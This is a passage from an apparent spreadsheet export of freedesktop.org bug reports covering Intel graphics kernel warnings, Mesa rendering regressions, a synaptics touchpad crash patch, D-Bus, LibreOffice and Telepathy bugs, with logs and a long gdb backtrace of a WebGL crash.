Commit:     Chris Wilson 
CommitDate: Wed Jun 28 15:25:29 2017 +0100
======================================
             Hardware
======================================
platform                   : Geminilake
motherboard model          : Geminilake
motherboard id             : GLKRVP1DDR4(05)
form factor                : Hand Held
manufacturer               : IntelCorp.
cpu family                 : Other
cpu family id              : 6
cpu information            : Genuine Intel(R) CPU @ 1.10GHz
gpu card                   : Intel Corporation Device 3184 (rev 01) (prog-if 00 [VGA controller])
memory ram                 : 3.67 GB
max memory ram             : 16 GB
cpu thread                 : 4
cpu core                   : 4
cpu model                  : 122
cpu stepping               : 0
hard drive                 : 74GiB (80GB)
current cd clock frequency : 79200 kHz
maximum cd clock frequency : 316800 kHz
displays connected         : eDP-1 DP-1 HDMI-A-2
======================================
             Firmware
======================================
dmc fw loaded             : yes
dmc version               : 1.4
guc fw loaded             : SUCCESS
guc version wanted        : 10.56
guc version found         : 10.56
======================================
             kernel parameters
======================================
drm.debug=0x1e i915.alpha_support=1 resume=/dev/sda3 fastboot i915.enable_guc_loading=2 i915.enable_guc_submission=2 log_buf_len=1M
attachments
=================================
dmesg.log
kern.log</t>
  </si>
  <si>
    <t>XORG-88903</t>
  </si>
  <si>
    <t>[PATCH] (priv-&gt;num_active_touches  &gt; priv-&gt;num_slots) leading to SIGSEGV</t>
  </si>
  <si>
    <t>Created attachment 113027
Proposal for bugfix applies against master branch 064445364b4775b25ba49c2250b22b169f291147
Hello
on my machine and touchpad (supports 3 touches) the Linux kernel may send multiple touch state updates per SYN_REPORT event for the same slot.
I'm not much into Kernel code but reading the documentation to the evdev module there's nowhere written this must not happen so the synaptics driver should deal with it. Anyways it doesn't and it had my XServer reliably crash after ~3h of usage for the past two weeks on my new Laptop :(
Behaviour reproduced on a 3.16.0-0.bpo.4-amd64 kernel as well as most recent 3.18.5 on a vanilla debian xorg-xserver xf86-input-synaptics as well as on the latest git versions.
Here's the event sequence that triggers it (some standard events like abs position events partially omitted):
OPEN SLOT 0
ABS X
ABS Y
[...]
SYN_REPORT
OPEN SLOT 1
ABS [...]
SYN_REPORT
CLOSE SLOT 0
OPEN SLOT 0          &lt;----- here bad things will happen
ABS [...]
SYN_REPORT
The function EventProcessTouchEvent() in eventcomm.c:600 (just overwrites the SLOTSTATE_CLOSE value so that HandleTouches in synaptics.c never gets notified by the close.
Attached patch is a proposal to get rid of this unpleasant matter.
Will inject SYN_REPORT behaviour if a slotstate would be overwritten and holds back the touch event until synaptics.c has been properly notified.
Best regards
Thilo</t>
  </si>
  <si>
    <t>thilo</t>
  </si>
  <si>
    <t>MESA-30143</t>
  </si>
  <si>
    <t>[KMS] mesa demo lodbias broken</t>
  </si>
  <si>
    <t>Running software:
kernel 2.6.36-rc3
mesa - commit d8a36620089e72d431ae853ec168f193f3376782
Author: Ian Romanick 
Date:   Fri Sep 10 13:10:26 2010 -0700
    mesa: Remove unused Emit flags from gl_shader_compiler_options
libdrm - commit b04515c5d6c95f573457a94267b855cceb639105
Author: Benjamin Herrenschmidt 
Date:   Fri Aug 6 13:55:11 2010 +1000
    libdrm: Fix PCI domain domain support
xf86-video-ati - commit bdd41fecdb19c83c6c7b793016b61d38065dcd13
Author: Alex Deucher 
Date:   Fri Aug 20 01:17:13 2010 -0400
    evergreen: set encoder type to DVI for HDMI
Xserver: 1.9.0
self-build with  gcc (GCC) 4.4.4
Hw:
01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200 SE] (rev 01) (prog-if 00 [VGA controller])
        Subsystem: Hightech Information System Ltd. Excalibur 9200SE VIVO 128M
        Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
        Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
        Latency: 64 (2000ns min) Cache Line Size: 32 bytes
        Interrupt: pin A routed to IRQ 16
        Region 0: Memory at d0000000 (32-bit prefetchable) [size=128M]
        Region 1: I/O ports at c800 [size=256]
        Region 2: Memory at dfef0000 (32-bit non-prefetchable) [size=64K]
        Expansion ROM at dfec0000 [disabled] [size=128K]
        Capabilities: [58] AGP version 2.0
                Status: RQ=80 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1x2x4
                Command: RQ=32 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x4
I'll add logs and screenshot. For me it looks like only very negative bias resulted in image displayed everything else just looks like  heavily corrupted mipmaps of texture. Probably bug in _mesa_meta_GenerateMipmap() may be due to driver setting something wrong</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-11518</t>
  </si>
  <si>
    <t>Media key symbols for Logitech UltraX keyboard</t>
  </si>
  <si>
    <t>Here is a Debian bug report (#425655). Most of the request has already been addressed in the CVS. But some issues remain. Please could you tell me whether they are valid or not? Thanks in advance.
From: Larry Lade 
To: Debian Bug Tracking System 
Subject: xkb-data: Media key symbols for Logitech UltraX keyboard
Date: Tue 22 May 2007 19:46:01 -0600
[Message part 1 (text/plain inline)]
Package: xkb-data
Version: 0.9-4
Severity: minor
Tags: patch
Current xkb definition for logiultrax simply includes generic Logitech media keyboard setup. This results in 1) the key labelled E-Mail to be non-functional 2) the rather minor error of the key labelled WWW set to XF86HomePage instead of XF86WWW.
I have included a patch which sets up this keyboard correctly.
A couple things to note:
a) The E-Mail key on this keyboard variously reports keycodes 120 and 236. I am not yet clear what causes this change. I've mapped both codes to XF86Mail.
b) I'm not sure why but it still seems necessary to include the Logitech defaults first to get these keys initialized.
b) It seems possible there are a number of keyboards floating around branded as Logitech Ultra-X. Mine is labelled:
Ultraflat Keyboard
Model Name: Y-SX49
P/N: 867327-0403
-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (990 'unstable') (500 'testing') (1 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.18-howard
Locale: LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
-- no debconf information</t>
  </si>
  <si>
    <t>adn</t>
  </si>
  <si>
    <t>DBUS-65959</t>
  </si>
  <si>
    <t>DBusString: _dbus_string_free() may crash if the previous _dbus_string_init() failed</t>
  </si>
  <si>
    <t>If the _dbus_string_init(arg) failed with OOM say arg-&gt;str is NULL now if then _dbus_string_free(arg) invoked to free the arg it's not safe see the below slice.
...
  dbus_free (real-&gt;str - real-&gt;align_offset)
...
and in dbus_free(void *memory)
...
  if (memory) /* we guarantee it's safe to free (NULL) */
however the above case will give memory an undefined invalid pointer so free() may crash.
...
      free (memory)
...</t>
  </si>
  <si>
    <t>MESA-9091</t>
  </si>
  <si>
    <t>Sometimes command PopAttrib can't restore the value of states that were saved with PushAttrib</t>
  </si>
  <si>
    <t>If command Material was invoked between PushAttrib and PopAttrib PopAttrib
wouldn't meet  the glspec.</t>
  </si>
  <si>
    <t>DRI-82939</t>
  </si>
  <si>
    <t>[BYT]igt/pm_rpm some subcases cause WARNING: CPU: 1 PID: 18504 at drivers/gpu/drm/i915/intel_uncore.c:47 gen6_write32+0x64/0xbf [i915]()</t>
  </si>
  <si>
    <t>Created attachment 105087
dmesg
==System Environment==
--------------------------
Regression: No
These cases always fail
Non-working platforms: BYT
==kernel==
--------------------------
origin/drm-intel-nightly: 257d90d13794c2eb545ab0d6c708f21e2a0378b6(fails)
    drm-intel-nightly: 2014y-08m-21d-10h-03m-09s integration manifest
origin/drm-intel-next-queued: 3a5f87c286515c54ff5c52c3e64d0c522b7570c0(causes system hang)
    drm: fix plane rotation when restoring fbdev configuration
origin/drm-intel-fixes: 1a125d8a2c22b11741fc47d4ffcf7a5ffa044dd3(fails)
    drm/i915: don't try to retrain a DP link on an inactive CRTC
==Bug detailed description==
-----------------------------
igt/pm_rpm some subcases cause WARNING: CPU: 1 PID: 18504 at drivers/gpu/drm/i915/intel_uncore.c:47 gen6_write32+0x64/0xbf [i915]()
Case list:
igt/pm_rpm/cursor
igt/pm_rpm/cursor-dpms
igt/pm_rpm/dpms-lpsp
igt/pm_rpm/dpms-mode-unset-lpsp
igt/pm_rpm/drm-resources-equal
igt/pm_rpm/fences
igt/pm_rpm/gem-execbuf
igt/pm_rpm/gem-mmap-cpu
igt/pm_rpm/gem-mmap-gtt
igt/pm_rpm/gem-pread
igt/pm_rpm/legacy-planes-dpms
igt/pm_rpm/modeset-lpsp
igt/pm_rpm/modeset-lpsp-stress
igt/pm_rpm/modeset-stress-extra-wait
igt/pm_rpm/pci-d3-state
igt/pm_rpm/rte
igt/pm_rpm/universal-planes-dpms
Output:
root@x-bytm02:/GFX/Test/Intel_gpu_tools/intel-gpu-tools/tests# ./pm_rpm --run-subtest cursor
IGT-Version: 1.7-g4d2f511 (x86_64) (Linux: 3.17.0-rc1_drm-intel-nightly_257d90_20140822+ x86_64)
Runtime PM support: 1
PC8 residency support: 0
Subtest cursor: SUCCESS
root@x-bytm02:/GFX/Test/Intel_gpu_tools/intel-gpu-tools/tests# dmesg -r|egrep |grep drm
[ 1895.638603] WARNING: CPU: 1 PID: 18504 at drivers/gpu/drm/i915/intel_uncore.c:47 gen6_write32+0x64/0xbf [i915]()
[ 1895.638608] Modules linked in: dm_mod snd_hda_codec_hdmi snd_hda_codec_conexant snd_hda_codec_generic iTCO_wdt iTCO_vendor_support snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep snd_pcm snd_timer r8169 pcspkr i2c_i801 lpc_ich snd mfd_core soundcore iosf_mbi battery wmi ac acpi_cpufreq uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[ 1895.638656] CPU: 1 PID: 18504 Comm: pm_rpm Tainted: G        W      3.17.0-rc1_drm-intel-nightly_257d90_20140822+ #1688
[ 1895.638931]  [] ? drm_modeset_lock+0x52/0xb3 [drm]
[ 1895.638945]  [] ? setplane_internal+0x262/0x2bc [drm]
[ 1895.638959]  [] ? drm_mode_cursor_common+0x19b/0x27d [drm]
[ 1895.638974]  [] ? drm_mode_cursor_ioctl+0x31/0x36 [drm]
[ 1895.638986]  [] ? drm_ioctl+0x279/0x3bc [drm]
[ 1895.639005]  [] ? drm_mode_setcrtc+0x48b/0x48b [drm]
[ 1895.639097] WARNING: CPU: 1 PID: 18504 at drivers/gpu/drm/i915/intel_uncore.c:47 vlv_read32+0x20/0x14c [i915]()
[ 1895.639101] Modules linked in: dm_mod snd_hda_codec_hdmi snd_hda_codec_conexant snd_hda_codec_generic iTCO_wdt iTCO_vendor_support snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep snd_pcm snd_timer r8169 pcspkr i2c_i801 lpc_ich snd mfd_core soundcore iosf_mbi battery wmi ac acpi_cpufreq uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[ 1895.639138] CPU: 1 PID: 18504 Comm: pm_rpm Tainted: G        W      3.17.0-rc1_drm-intel-nightly_257d90_20140822+ #1688
[ 1895.639365]  [] ? drm_modeset_lock+0x52/0xb3 [drm]
[ 1895.639378]  [] ? setplane_internal+0x262/0x2bc [drm]
[ 1895.639392]  [] ? drm_mode_cursor_common+0x19b/0x27d [drm]
[ 1895.639406]  [] ? drm_mode_cursor_ioctl+0x31/0x36 [drm]
[ 1895.639418]  [] ? drm_ioctl+0x279/0x3bc [drm]
[ 1895.639436]  [] ? drm_mode_setcrtc+0x48b/0x48b [drm]
[ 1895.639532] WARNING: CPU: 1 PID: 18504 at drivers/gpu/drm/i915/intel_uncore.c:47 gen6_write32+0x64/0xbf [i915]()
[ 1895.639554] Modules linked in: dm_mod snd_hda_codec_hdmi snd_hda_codec_conexant snd_hda_codec_generic iTCO_wdt iTCO_vendor_support snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep snd_pcm snd_timer r8169 pcspkr i2c_i801 lpc_ich snd mfd_core soundcore iosf_mbi battery wmi ac acpi_cpufreq uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[ 1895.639697] CPU: 1 PID: 18504 Comm: pm_rpm Tainted: G        W      3.17.0-rc1_drm-intel-nightly_257d90_20140822+ #1688
[ 1895.639923]  [] ? drm_modeset_lock+0x52/0xb3 [drm]
[ 1895.639937]  [] ? setplane_internal+0x262/0x2bc [drm]
[ 1895.639950]  [] ? drm_mode_cursor_common+0x19b/0x27d [drm]
[ 1895.639979]  [] ? drm_mode_cursor_ioctl+0x31/0x36 [drm]
[ 1895.640006]  [] ? drm_ioctl+0x279/0x3bc [drm]
[ 1895.640033]  [] ? drm_mode_setcrtc+0x48b/0x48b [drm]
[ 1895.640118] WARNING: CPU: 1 PID: 18504 at drivers/gpu/drm/i915/intel_uncore.c:47 vlv_read32+0x20/0x14c [i915]()
[ 1895.640141] Modules linked in: dm_mod snd_hda_codec_hdmi snd_hda_codec_conexant snd_hda_codec_generic iTCO_wdt iTCO_vendor_support snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep snd_pcm snd_timer r8169 pcspkr i2c_i801 lpc_ich snd mfd_core soundcore iosf_mbi battery wmi ac acpi_cpufreq uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[ 1895.640189] CPU: 1 PID: 18504 Comm: pm_rpm Tainted: G        W      3.17.0-rc1_drm-intel-nightly_257d90_20140822+ #1688
[ 1895.640445]  [] ? drm_modeset_lock+0x52/0xb3 [drm]
[ 1895.640459]  [] ? setplane_internal+0x262/0x2bc [drm]
[ 1895.640473]  [] ? drm_mode_cursor_common+0x19b/0x27d [drm]
[ 1895.640787]  [] ? drm_mode_cursor_ioctl+0x31/0x36 [drm]
[ 1895.640799]  [] ? drm_ioctl+0x279/0x3bc [drm]
[ 1895.640817]  [] ? drm_mode_setcrtc+0x48b/0x48b [drm]
==Reproduce steps==
---------------------------- 
1../pm_rpm --run-subtest cursor</t>
  </si>
  <si>
    <t>LIBREOFFICE-86050</t>
  </si>
  <si>
    <t>Some input boxes have unnecessary scrollbars</t>
  </si>
  <si>
    <t>Created attachment 109142
Screenshot of useless scrollbar
Some input widgets (boxes and the like) have scrollbars even when not needed. See the attached screenshot.</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-56575</t>
  </si>
  <si>
    <t>.xlr is a application/vnd.ms-works Spreadsheet</t>
  </si>
  <si>
    <t>Created attachment 69296
Patch for xlr filetype
.xlr was detected as 'application/x-ole-storage' and couldn't be assigned to the right application.
It is a MS-Works Spreadsheet file see https://bugs.freedesktop.org/show_bug.cgi?id=45922 for more details.
Attached is a patch with the filetype and a testcase added.</t>
  </si>
  <si>
    <t>TELEPATHY-27553</t>
  </si>
  <si>
    <t>telepathy-butterfly crashed with InvalidHandle in check_handle()</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/telepathy-butterfly/+bug/512596 and has some duplicates there
The descriptions seems to indicate it happens when adding a buddy
Stacktrace on 0.5.7
Traceback (most recent call last):
  File /usr/lib/pymodules/python2.6/papyon/client.py line 446 in event
    self._dispatch(method_name *event_args)
  File /usr/lib/pymodules/python2.6/papyon/event/__init__.py line 44 in _dispatch
    if event_handler._dispatch_event(name *args):
  File /usr/lib/pymodules/python2.6/papyon/event/__init__.py line 65 in _dispatch_event
    handler(*params)
  File /usr/lib/python2.6/dist-packages/butterfly/channel/group.py line 122 in on_addressbook_group_added
    self.AddMembers(self.__pending_add None)
  File /usr/lib/python2.6/dist-packages/butterfly/channel/group.py line 71 in AddMembers
    contact_handle_id)
  File /usr/lib/python2.6/dist-packages/butterfly/connection.py line 139 in handle
    self.check_handle(handle_type handle_id)
  File /usr/lib/python2.6/dist-packages/telepathy/server/conn.py line 154 in check_handle
    (handle handle_type))
InvalidHandle: org.freedesktop.Telepathy.Error.InvalidHandle: handle number 18 not valid for type 1
Other stacktraces:
http://launchpadlibrarian.net/38384257/Traceback.txt
http://launchpadlibrarian.net/40823588/Traceback.txt</t>
  </si>
  <si>
    <t>MESA-107052</t>
  </si>
  <si>
    <t>[Regression][bisected]. Crookz - The Big Heist Demo can't be launched despite the true flag in drirc</t>
  </si>
  <si>
    <t>Created attachment 140363
screenshot with error
Mesa 17.2.8
drirc
Application can be launched
(side note - If I set this value to false - I will see an error about OpenGL mismatch)
______________________________________________________________
Mesa 18.1.0 (or 18.2.0 latest from git)
drirc - the same (true)
Application can't be launched and shows OpenGL mismatch.
As I found out from the thread related to fixes in radeon this drirc list was created for the games which require higher openGL version but in fact - don't use it features.
upd - again according to discussion in radeon I can suppose that the same problem can be related and to these games (because they are using same workaround):
Worms W.M.D and Tropico 5</t>
  </si>
  <si>
    <t>XORG-42414</t>
  </si>
  <si>
    <t>Rendering corruptions with gimp's color-chooser [SNA 2.16.901]</t>
  </si>
  <si>
    <t>Created attachment 52936
screenshot of the problem
When using gimp with SNA enabled I get corruptions with Gimp's color chooser - the gradient doesn't seem to get repainted while selecting a color. (there's some kind of selection cross)
Screenshot attached works fine with UXA.
intel i945GM
libdrm-2.4.27
pixman-0.23.8
linux-3.1.0
xorg 1.11.1</t>
  </si>
  <si>
    <t>LIBREOFFICE-63936</t>
  </si>
  <si>
    <t>LibreOffice Menus Stop Working even with libreoffice&gt;=1:3.6.2~rc2-0ubuntu4 and indicator-appmenu&gt;=12.10.3-0ubuntu2.1</t>
  </si>
  <si>
    <t>Problem description: 
Using Ubuntu 13.04 and LibreOffice 4.0.2.2 the menu items in unity do not highlight.
Also sometimes it is not possible to send commands by clicking on the menu items. This seems to happen at random.
Steps to reproduce:
1. Install Ubuntu 13.04 and LO 4.0.2.2
2. Click on a unity menu item like edit
3. See if the sub-items highlight
Current behavior:
No highlights on the menu items
Expected behavior:
highlights.
Operating System: Ubuntu
Version: 4.0.2.2 release</t>
  </si>
  <si>
    <t>shopping</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-25705</t>
  </si>
  <si>
    <t>Created attachment 32171
public SSH RSA key
Hello
I'd like to request an account for NetworkManager project.
Real Name: Jiri Klimes
or with accents JiÅ™Ã­ KlimeÅ¡
Email: jklimes@redhat.com
Preferred account name: jklimes
SSH and GPG keys are attached.
Thanks very much indeed.
Jirka</t>
  </si>
  <si>
    <t>blueowl</t>
  </si>
  <si>
    <t>LIBOPENRAW-13718</t>
  </si>
  <si>
    <t>gdk-pixbuf demo build even without gnome support in</t>
  </si>
  <si>
    <t>gdk-pixbuf is required to build libopenraw and is not mentionned in the README file.</t>
  </si>
  <si>
    <t>ludovic</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-18706</t>
  </si>
  <si>
    <t>Your Mailman fails on diacritics in names</t>
  </si>
  <si>
    <t>From what I know diaciritcs should work.
(pasting an email to the list)
Just a warning it seem that the mailman setup on
lists.freedesktop.org chokes on diacritics.
So don't use special characters in the name.
I tried to input my name with diacritics and I got this nice message:
==============================
Bug in Mailman version 2.1.9
We're sorry we hit a bug!
Please inform the webmaster for this site of this problem. Printing of
traceback and other system information has been explicitly inhibited
but the webmaster can find this information in the Mailman error logs.
==============================
As a test sting you can use my name Eddy PetriÈ™or (that charaters
you might not see correctly is s comma unicode point 0x021A) and
there are several such other characters -- see
http://wiki.debian.org/L10N/Romanian/CommaTransition for details about
comma characters)</t>
  </si>
  <si>
    <t>richih.mailinglist</t>
  </si>
  <si>
    <t>MESA-27710</t>
  </si>
  <si>
    <t>[llvmpipe] piglit fbo-3d regression</t>
  </si>
  <si>
    <t>Created attachment 35126
fbo-3d.png
mesa: 411d5063323ccdb85ec090f1c852fcc8e9cd0e64 (master)
Run piglit fbo-3d.
0639765b2850739af1678f10fc0c5706d5827776 is first bad commit
commit 0639765b2850739af1678f10fc0c5706d5827776
Author: Brian Paul 
Date:   Fri Apr 16 09:10:54 2010 -0600
    Merge the lp-surface-tiling branch into master.</t>
  </si>
  <si>
    <t>DRI-68630</t>
  </si>
  <si>
    <t>igt/gem_mmap_gtt/access fails</t>
  </si>
  <si>
    <t>MESA-32306</t>
  </si>
  <si>
    <t>[i965] SIGSEGV intel_fbo.c:662 WebGL object-deletion-behaviour test</t>
  </si>
  <si>
    <t>mesa: ef3f7e61b314236cbb7ed2cf24d34c6f90d9cfca (master)
chipset: GM45
system architure: i686
xserver-xorg-video-intel: 2:2.13.901-2ubuntu1
libdrm-intel1: 2.4.22-2ubuntu1
kernel version: 2.6.37-8-generic
Linux distribution: Ubuntu 11.04 i386
Run WebGL conformance test conformance/object-deletion-behaviour.html.
https://cvs.khronos.org/svn/repos/registry/trunk/public/webgl/sdk/tests/conformance/object-deletion-behaviour.html
Program received signal SIGSEGV Segmentation fault.
intel_finish_render_texture (ctx=0xa4f18000 att=0xa904b1dc) at intel_fbo.c:662
662	   intel_image-&gt;used_as_render_target = GL_FALSE
(gdb) bt
#0  intel_finish_render_texture (ctx=0xa4f18000 att=0xa904b1dc)
    at intel_fbo.c:662
#1  0x03175943 in _mesa_remove_attachment (ctx=0xa4f18000 att=0xa904b1dc)
    at main/fbobject.c:265
#2  0x031bf83f in unbind_texobj_from_fbo (n=1 textures=0xbf95876c)
    at main/texobj.c:864
#3  _mesa_DeleteTextures (n=1 textures=0xbf95876c) at main/texobj.c:932
#4  0x01428472 in fDeleteTextures (this=0xa752a760 tobj=0xa02e50b0)
    at ../../../dist/include/GLContext.h:1772
#5  mozilla::WebGLContext::DeleteTexture (this=0xa752a760 tobj=0xa02e50b0)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/content/canvas/src/WebGLContextGL.cpp:783
#6  0x017ff5f6 in nsICanvasRenderingContextWebGL_DeleteTexture (cx=0xa6662360 
    argc=1 vp=0xb37fd140) at dom_quickstubs.cpp:29556
#7  0x01e4b94e in CallJSNative (this=0xbf958cac)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jscntxtinlines.h:684
#8  CallCompiler::generateNativeStub (this=0xbf958cac)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodjit/MonoIC.cpp:627
#9  0x01e420ec in js::mjit::ic::NativeCall (f= 
    ic=0xa65eb498)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodji
t/MonoIC.cpp:851
#10 0x09a5195d in ?? ()
#11 0x01df202f in EnterMethodJIT (cx=0xa6662360)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodjit/MethodJIT.cpp:739
#12 CheckStackAndEnterMethodJIT (cx=0xa6662360)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodjit/MethodJIT.cpp:764
#13 js::mjit::JaegerShot (cx=0xa6662360)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodjit/MethodJIT.cpp:781
#14 0x01cb382f in RunScript (cx=0xa6662360 chain=0xb1c92e38 
    script=0xa74ef3a0 prev=0xb37fd088 flags=8 result=0xb37fd0c8)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jsinterp.cpp:662
#15 js::Execute (cx=0xa6662360 chain=0xb1c92e38 script=0xa74ef3a0 
    prev=0xb37fd088 flags=8 result=0xb37fd0c8)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jsinterp.cpp:1008
#16 0x01ccf15e in js::EvalKernel (cx=0xa6662360 argc=1 vp=0xb37fd0c8 
    evalType=js::DIRECT_EVAL caller=0xb37fd088 scopeobj=0xb1c92e38)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jsobj.cpp:1247
#17 0x01cb5280 in js::DirectEval (cx=0xa6662360 evalfun=0xb1c78460 argc=1 
    vp=0xb37fd0c8)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jsinterp.cpp:1345
#18 0x01e6303b in js::mjit::stubs::Eval (f=... argc=)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodjit/InvokeHelpers.cpp:465
#19 0x02b140ac in ?? ()
#20 0x01df202f in EnterMethodJIT (cx=0xa6662360)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodjit/MethodJIT.cpp:739
#21 CheckStackAndEnterMethodJIT (cx=0xa6662360)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodjit/MethodJIT.cpp:764
#22 js::mjit::JaegerShot (cx=0xa6662360)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/methodjit/MethodJIT.cpp:781
#23 0x01cb382f in RunScript (cx=0xa6662360 chain=0xb1cc20a0 
    script=0xa7543000 prev=0x0 flags=0 result=0x0)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jsinterp.cpp:662
#24 js::Execute (cx=0xa6662360 chain=0xb1cc20a0 script=0xa7543000 prev=0x0 
    flags=0 result=0x0)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jsinterp.cpp:1008
#25 0x01c3cc8d in JS_EvaluateUCScriptForPrincipals (cx=0xa6662360 
    obj=0xb1cc20a0 principals=0xa70ad064 chars=0xa7643008 length=3439 
    filename=0xa747ee28 https://cvs.khronos.org/svn/repos/registry/trunk/public/webgl/sdk/tests/conformance/object-deletion-behaviour.html lineno=17 
    rval=0x0)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jsapi.cpp:4819
#26 0x01c3d026 in JS_EvaluateUCScriptForPrincipalsVersion (cx=0xa6662360 
    obj=0xb1cc20a0 principals=0xa70ad064 chars=0xa7643008 length=3439 
    filename=0xa747ee28 https://cvs.khronos.org/svn/repos/registry/trunk/public/webgl/sdk/tests/conformance/object-deletion-behaviour.html lineno=17 
    rval=0x0 version=JSVERSION_DEFAULT)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/js/src/jsapi.cpp:4795
#27 0x015246af in nsJSContext::EvaluateString (this=0xa71e1c40 aScript=... 
    aScopeObject=0xb1cc20a0 aPrincipal=0xa70ad060 
    aURL=0xa747ee28 https://cvs.khronos.org/svn/repos/registry/trunk/public/webgl/sdk/tests/conformance/object-deletion-behaviour.html aLineNo=17 
    aVersion=0 aRetValue=0x0 aIsUndefined=0xbf9591f4)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/dom/base/nsJSEnvironment.cpp:1731
#28 0x013e94f5 in nsScriptLoader::EvaluateScript (this=0xa74cb140 
    aRequest=0xa7749880 aScript=...)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/content/base/src/nsScriptLoader.cpp:845
#29 0x013e97af in nsScriptLoader::ProcessRequest (this=0xa74cb140 
    aRequest=0xa7749880)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/content/base/src/nsScriptLoader.cpp:748
#30 0x013eb2a7 in nsScriptLoader::ProcessScriptElement (this=0xa74cb140 
    aElement=0xa767a134)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/content/base/src/nsScriptLoader.cpp:700
#31 0x013e8875 in nsScriptElement::MaybeProcessScript (this=0xa767a134)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/content/base/src/nsScriptElement.cpp:197
#32 0x01486708 in nsHTMLScriptElement::MaybeProcessScript (this=0xa767a100)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/content/html/content/src/nsHTMLScriptElement.cpp:551
#33 0x01485f67 in nsHTMLScriptElement::DoneAddingChildren (this=0xa767a100 
    aHaveNotified=1)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/content/html/content/src/nsHTMLScriptElement.cpp:480
#34 0x015f3ffb in nsHtml5TreeOpExecutor::RunScript (this=0xa72c84c0 
    aScriptElement=0xa767a100)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/parser/html/nsHtml5TreeOpExecutor.cpp:730
#35 0x015f4a37 in nsHtml5TreeOpExecutor::RunFlushLoop (this=0xa72c84c0)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/parser/html/nsHtml5TreeOpExecutor.cpp:525
#36 0x015f4c75 in nsHtml5ExecutorReflusher::Run (this=0xa66fdac0)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/parser/html/nsHtml5TreeOpExecutor.cpp:90
#37 0x01b5054d in nsThread::ProcessNextEvent (this=0xb75db9c0 mayWait=0 
    result=0xbf959a5c)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/xpcom/threads/nsThread.cpp:609
#38 0x01b1b84e in NS_ProcessNextEvent_P (thread= 
    mayWait=0) at nsThreadUtils.cpp:250
#39 0x01a65e7b in mozilla::ipc::MessagePump::Run (this=0xb75d68b0 
    aDelegate=0xb752c600)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/ipc/glue/MessagePump.cpp:110
#40 0x01b820fc in MessageLoop::RunInternal (this=0xb752c600)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/ipc/chromium/src/base/message_loop.cc:219
#41 0x01b82160 in RunHandler (this=0xb752c600)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/ipc/chromium/src/base/message_loop.cc:202
#42 MessageLoop::Run (this=0xb752c600)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/ipc/chromium/src/base/message_loop.cc:176
